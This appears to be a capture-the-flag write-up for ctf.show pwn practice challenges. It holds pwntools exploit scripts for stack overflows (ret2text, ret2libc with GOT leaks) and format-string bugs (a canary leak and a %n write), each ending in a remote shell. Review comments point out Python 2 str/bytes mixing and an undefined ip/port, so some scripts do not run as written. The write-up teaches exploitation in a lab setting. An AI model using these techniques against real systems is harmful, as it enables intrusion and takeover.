PWN01
简单栈溢出,ret2text
from pwn import *
#p = process("./pwn1")
# NOTE(review): `ip` and `port` are not defined anywhere on this page; as
# written this line raises NameError before anything is sent.
p = remote(ip,port)
# Read (and discard) whatever the service prints before accepting input.
p.recv()
# ret2text (see the section header): 0x9 bytes of buffer plus 4 bytes of
# saved ebp, then a fixed 32-bit code address to return into. A hard-coded
# code address assumes the binary is not PIE, and supplying no canary value
# assumes no stack protector -- both are what checksec should confirm for
# the target (not shown on this page).
# NOTE(review): 'a'*13 is a str while p32() returns bytes; this mixed
# concatenation is Python 2 pwntools style and raises TypeError on Python 3.
payload = 'a'*(0x9+4) + p32(0x0804850F)
p.sendline(payload)
# Hand the connection over to the operator.
p.interactive()
PWN03
32位程序,栈溢出,无system,ret2libc,32位程序通过栈传参
from pwn import *
from LibcSearcher import *
p=remote("pwn.challenge.ctf.show",28051)
#p=process("./stack1")
# Resolve the PLT/GOT entries of puts from the local copy of the binary.
# Fixed (non-PIE) addresses are assumed throughout, main_addr included.
elf=ELF("./stack1")
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
main_addr=0x80484BB
# Stage 1 (leak): 9 bytes of buffer + 4 of saved ebp reach the return
# address; return into puts@plt with puts@got as its argument. 32-bit
# cdecl layout: the return address (main_addr) comes before the argument,
# so main runs again after the leak and the same overflow is reused below.
payload1='a'*(9+4)+p32(puts_plt)+p32(main_addr)+p32(puts_got)
p.sendline(payload1)
p.recvuntil("\n\n")
# The first 4 bytes puts prints are the runtime address of libc's puts.
puts_addr=u32(p.recv(4))
print(hex(puts_addr))
#puts_addr=0xc0a0
# LibcSearcher presumably identifies the remote libc build from this single
# leaked address; if more than one build matches, the offsets below are a
# guess. str_bin_sh is its symbol for a "/bin/sh" string inside libc.
lib=LibcSearcher("puts",puts_addr)
lib_base=puts_addr-lib.dump("puts")
system_addr=lib_base+lib.dump("system")
binsh_addr=lib_base+lib.dump("str_bin_sh")
# Stage 2: same overflow, now returning into system with a dummy return
# address ('aaaa') followed by its argument. The ASLR bypass here is the
# GOT leak; a PIE build would additionally break puts_plt/puts_got/main_addr.
payload2='a'*(9+4)+p32(system_addr)+'aaaa'+p32(binsh_addr)
p.sendline(payload2)
p.interactive()
PWN04
存在canary,格式化字符串漏洞,通过格式化字符串漏洞泄露canary,再构造栈溢出
首先确定输入的偏移为6
canary和buf的距离为(0x70-0xc)=0x64=100
确定canary的偏移为100/4+6=31
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28048)
# Per the section header: user input is used directly as a printf format,
# the input itself is stack argument 6, and the canary lies 100 bytes
# (25 slots) above it, i.e. argument 31. "%31$x" prints that slot in hex.
payload='%31$x'
p.recvuntil("Hello Hacker!\n")
p.sendline(payload)
canary=int(p.recv(),16)
# Fixed code address (non-PIE assumed). The name suggests a function in the
# binary that spawns a shell; that is not verifiable from this page.
shell=0x804859B
# Overflow layout: 0x70-0xc bytes of buffer, the leaked canary written back
# in place so the stack-protector check still passes, 0xc bytes of filler
# (presumably saved registers/ebp up to the return address), then the
# target. The canary itself is intact here -- it is the format-string bug
# (user-controlled format) that defeats it.
payload2='a'*(0x70-0xc)+p32(canary)+'a'*0xc+p32(shell)
p.sendline(payload2)
p.interactive()
PWN05
简单栈溢出,ret2text
from pwn import *
#from LibcSearcher import *
context.log_level = 'debug'
#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28010)
# ret2text: 0x14-byte buffer + 4 bytes of saved ebp, then a fixed 32-bit
# code address. Assumes a non-PIE build; no canary value is supplied, so
# the binary is presumably compiled without stack protector.
payload='a'*(0x14+4)+p32(0x8048486)
p.sendline(payload)
p.interactive()
PWN06
简单栈溢出,ret2text,注意18位ubuntu需要栈对齐
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28081)
# 64-bit ret2text: 0xc-byte buffer + 8 bytes of saved rbp, then a fixed
# 8-byte code address (non-PIE assumed). The header's note about stack
# alignment on Ubuntu 18 presumably refers to the 16-byte alignment glibc
# expects at a call; the address chosen here has to satisfy it on its own,
# unlike the PWN07 chain which inserts a bare ret for that purpose.
payload='a'*(0xc+8)+p64(0x40057B)
p.sendline(payload)
p.interactive()
PWN07
ret2libc,64位程序先通过rdi等6个寄存器传参,多的通过栈传参
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
p=remote("pwn.challenge.ctf.show",28094)
#p=process("./pwn")
# Non-PIE assumed: PLT/GOT/main and the two gadget addresses below are fixed.
elf=ELF("./pwn")
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
main_addr=elf.sym["main"]
# Gadget addresses taken from the binary. Roles inferred from use: rdi_addr
# is always followed by the value that becomes the first argument (a
# "pop rdi; ret"), ret_addr is a lone "ret" used only for alignment.
rdi_addr=0x4006e3
ret_addr=0x4004c6
# Stage 1 (leak): 0xc-byte buffer + 8 bytes of saved rbp, then
# puts(puts_got) under the SysV x86-64 convention (first argument in rdi,
# per the section header), returning into main afterwards.
payload1='a'*(0xc+8)+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendline(payload1)
p.recvuntil("\n")
# puts stops at the first NUL byte, so the leaked pointer is typically
# 6 bytes; right-pad with zeros to 8 before unpacking.
puts_addr= u64(p.recvuntil(b"\n",drop=True).ljust(8,b"\x00"))
print(hex(puts_addr))
# LibcSearcher presumably identifies the remote libc build from the single
# leaked address; ambiguous matches make the offsets below a guess.
lib=LibcSearcher("puts",puts_addr)
lib_base=puts_addr-lib.dump("puts")
system_addr=lib_base+lib.dump("system")
binsh_addr=lib_base+lib.dump("str_bin_sh")
# Stage 2: the extra ret keeps rsp 16-byte aligned when system is entered
# (cf. the alignment note in the PWN06 header), then system(binsh_addr).
# NOTE(review): the receive side uses bytes literals but the payloads are
# str + bytes, which only concatenates under Python 2 pwntools.
payload2='a'*(0xc+8)+p64(ret_addr)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload2)
p.interactive()
01栈溢出之ret2text
简单ret2text,注意栈对齐
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28097)
# 64-bit ret2text: 0x80-byte buffer + 8 bytes of saved rbp, then a fixed
# 8-byte code address (non-PIE assumed, no canary supplied). The header's
# alignment remark: the chosen address must leave rsp 16-byte aligned by
# itself, since no ret gadget is inserted here.
payload='a'*(0x80+8)+p64(0x40063B)
p.sendline(payload)
p.interactive()
PWN10
格式化字符串漏洞,偏移为7
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28067)
# Format-string write. Per the section header the input starts at stack
# argument 7, so the 4-byte pointer placed first occupies slot 7. The 12
# filler bytes bring the character count to 16, and "%7$n" then stores
# that count (16) through the slot-7 pointer. 0x804A030 is a fixed data
# address (non-PIE assumed); what lives there is not shown on this page.
# Defensive fix for this bug class: never pass user input as the format
# argument (use printf("%s", buf)) and build with -Wformat-security.
payload=p32(0x804A030)+'a'*0xc+'%7$n'
p.sendline(payload)
p.interactive()